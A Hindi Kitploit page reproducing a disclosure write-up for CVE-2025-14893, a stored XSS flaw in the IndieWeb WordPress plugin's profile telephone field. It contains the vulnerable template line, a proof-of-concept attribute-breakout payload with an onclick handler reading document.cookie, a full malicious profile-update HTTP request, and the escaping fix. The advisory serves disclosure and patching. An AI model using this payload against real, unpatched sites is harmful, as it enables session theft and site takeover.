Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-14893 — IndieWeb WordPress प्लगइन में प्रमाणित संग्रहीत क्रॉस-साइट स्क्रिप्टिंग (XSS) | Kitploit
उपकरण/GitHubGitHub/d3kc4rt1/cve-2025-14893
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगपेपर और शोधलर्निंग और शिक्षा
GitHubd3kc4rt1/cve-2025-14893

CVE-2025-14893

IndieWeb WordPress प्लगइन में प्रमाणित संग्रहीत क्रॉस-साइट स्क्रिप्टिंग (XSS)

रिपॉजिटरी देखें
15 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-14893: IndieWeb WordPress प्लगइन में प्रमाणित संग्रहीत क्रॉस-साइट स्क्रिप्टिंग (XSS)

अस्वीकरण: यह रिपॉजिटरी केवल शैक्षिक उद्देश्यों और नैतिक प्रकटीकरण के लिए बनाई गई है। इस कमजोरी की सूचना विक्रेता को जिम्मेदारी से दी गई है और इसे पैच किया जा चुका है। उचित प्राधिकरण के बिना सिस्टम का शोषण करने के लिए इस जानकारी का उपयोग न करें।

कार्यकारी सारांश

वर्डप्रेस के IndieWeb प्लगइन (संस्करण <= 4.0.5) में एक संग्रहीत क्रॉस-साइट स्क्रिप्टिंग (XSS) कमजोरी पाई गई। यह कमजोरी लेखक या उच्च विशेषाधिकार वाले प्रमाणित हमलावरों को अपने उपयोगकर्ता प्रोफ़ाइल के "टेलीफ़ोन" फ़ील्ड में दुर्भावनापूर्ण JavaScript इंजेक्ट करने की अनुमति देती है।

जब "Author Profile H-Card Widget" को फ्रंटएंड पर प्रदर्शित किया जाता है, तो इंजेक्ट की गई स्क्रिप्ट उचित सैनिटाइज़ेशन के बिना रेंडर हो जाती है। यदि कोई उच्च विशेषाधिकार प्राप्त उपयोगकर्ता, जैसे कि व्यवस्थापक, हेरफेर किए गए लिंक पर क्लिक करता है, तो स्क्रिप्ट उनके ब्राउज़र संदर्भ में निष्पादित होती है। इससे सत्र अपहरण, अनधिकृत प्रशासनिक कार्रवाइयाँ और पूर्ण खाता अधिग्रहण (ATO) हो सकता है।

कमजोरी का अवलोकन

  • CVE ID: CVE-2025-14893
  • उत्पाद: IndieWeb (WordPress प्लगइन)
  • प्रभावित संस्करण: <= 4.0.5
  • कमजोरी का प्रकार: संग्रहीत क्रॉस-साइट स्क्रिप्टिंग (XSS) (CWE-79)
  • आवश्यक विशेषाधिकार: प्रमाणित (लेखक स्तर और उससे ऊपर)
  • तकनीकी विवरण और मूल कारण

    मुख्य समस्या प्लगइन के टेम्प्लेटिंग सिस्टम में उपयोगकर्ता मेटाडेटा के असुरक्षित प्रबंधन में है, विशेष रूप से वर्डप्रेस के अंतर्निहित एस्केपिंग फ़ंक्शन का उपयोग करने में विफलता।

    कमजोर फ़ाइल: templates/h-card.php (पंक्ति 27)

    root@kitploit:~
    <a class="p-tel tel" href="tel:<?php echo $user->get( 'tel' ); ?>"><?php echo $user->get( 'tel' ); ?></a>
    

    दोष: प्लगइन सीधे उपयोगकर्ता के tel मेटाडेटा को href HTML विशेषता के अंदर echo का उपयोग करके आउटपुट करता है, बिना इसे esc_attr() में लपेटे। यह हमलावर को एक क्राफ्टेड स्ट्रिंग प्रदान करने की अनुमति देता है जिसमें एक डबल-कोट (") शामिल है ताकि href विशेषता को समय से पहले बंद किया जा सके, उसके बाद मनमानी HTML विशेषताएँ (जैसे style या onclick)।

    व्यावसायिक प्रभाव

    • खाता अधिग्रहण (ATO): यदि कोई व्यवस्थापक हेरफेर किए गए तत्व के साथ इंटरैक्ट करता है, तो हमलावर का JavaScript सत्र कुकीज़ चुरा सकता है या प्रशासनिक AJAX अनुरोध निष्पादित कर सकता है, जिससे हमलावर को वर्डप्रेस साइट पर पूर्ण नियंत्रण मिल जाता है।
    • प्रतिष्ठा को नुकसान: हमलावर पृष्ठ के दृश्य तत्वों को संशोधित कर सकता है (विकृति) या वैध आगंतुकों को दुर्भावनापूर्ण तृतीय-पक्ष वेबसाइटों पर रीडायरेक्ट कर सकता है।

    प्रमाण की अवधारणा (PoC)

    पूर्वापेक्षाएँ

    1. WordPress इंस्टॉल हो और IndieWeb <= 4.0.5 सक्रिय हो।
    2. लेखक भूमिका वाला एक हमलावर खाता।
    3. "Author Profile H-Card Widget" को किसी दृश्य फ्रंटएंड क्षेत्र (जैसे, साइडबार) में जोड़ा गया हो।

    शोषण के चरण

    1. लेखक के रूप में WordPress डैशबोर्ड में लॉग इन करें।
    2. प्रोफ़ाइल (/wp-admin/profile.php) पर जाएँ।
    3. टेलीफ़ोन फ़ील्ड तक नीचे स्क्रॉल करें।
    4. निम्नलिखित पेलोड इंजेक्ट करें (जो href विशेषता से बाहर निकलता है):
      root@kitploit:~
      Click_Me" style="background:#ff4444; color:white; padding:5px; display:inline-block;" onclick="alert(document.cookie);
      
    5. प्रोफ़ाइल अपडेट करें पर क्लिक करें।
    6. महत्वपूर्ण चरण: एक नई पोस्ट बनाएँ और प्रकाशित करें। कमजोर विजेट केवल एकल पोस्ट पृष्ठों (is_single()) पर लेखक की जानकारी प्रदर्शित करने के लिए रेंडर होता है।
    7. ट्रिगर: जब कोई व्यवस्थापक फ्रंटएंड पर प्रकाशित पोस्ट पर जाता है और नए स्टाइल किए गए "Click_Me" टेलीफ़ोन बटन पर क्लिक करता है, तो XSS पेलोड (सत्र कुकी को अलर्ट करते हुए) निष्पादित होता है।

    उदाहरण दुर्भावनापूर्ण HTTP अनुरोध (प्रोफ़ाइल अद्यतन)

    root@kitploit:~
    POST /wp-admin/profile.php HTTP/1.1
    Host: TARGET
    Content-Type: application/x-www-form-urlencoded
    Cookie: [Author_Session_Cookies]
    
    _wpnonce=[valid_nonce]&_wp_http_referer=%2Fwp-admin%2Fprofile.php&from=profile&checkuser_id=2&color-nonce=[nonce]&admin_color=fresh&admin_bar_front=1&first_name=&last_name=&nickname=attacker&display_name=attacker&email=attacker%40example.com&tel=Click_Me"%20style%3D"background%3A%23ff4444%3B%20color%3Awhite%3B%20padding%3A5px%3B%20display%3Ainline-block%3B"%20onclick%3D"alert(document.cookie)%3B&action=update&user_id=2&submit=Update+Profile
    

    उपचार

    इस कमजोरी को पैच करने के लिए, प्लगइन डेवलपर्स को वर्डप्रेस के esc_attr() और esc_html() फ़ंक्शन का उपयोग करके आउटपुट को ठीक से एस्केप करना होगा।

    पैच किया गया कोड उदाहरण:

    root@kitploit:~
    <a class="p-tel tel" href="tel:<?php echo esc_attr( $user->get( 'tel' ) ); ?>"><?php echo esc_html( $user->get( 'tel' ) ); ?></a>
    

    समयरेखा

    • तिथि (2026-03-03): Wordfence को रिपोर्ट की गई।
    • तिथि (2026-03-20): कमजोरी को पैच किया गया / सार्वजनिक प्रकटीकरण।

    संदर्भ और श्रेय

    • Wordfence Vulnerability Database
    • CVE-2025-14893 on NVD
    • IndieWeb Plugin on WordPress.org
    टूल डाउनलोड करें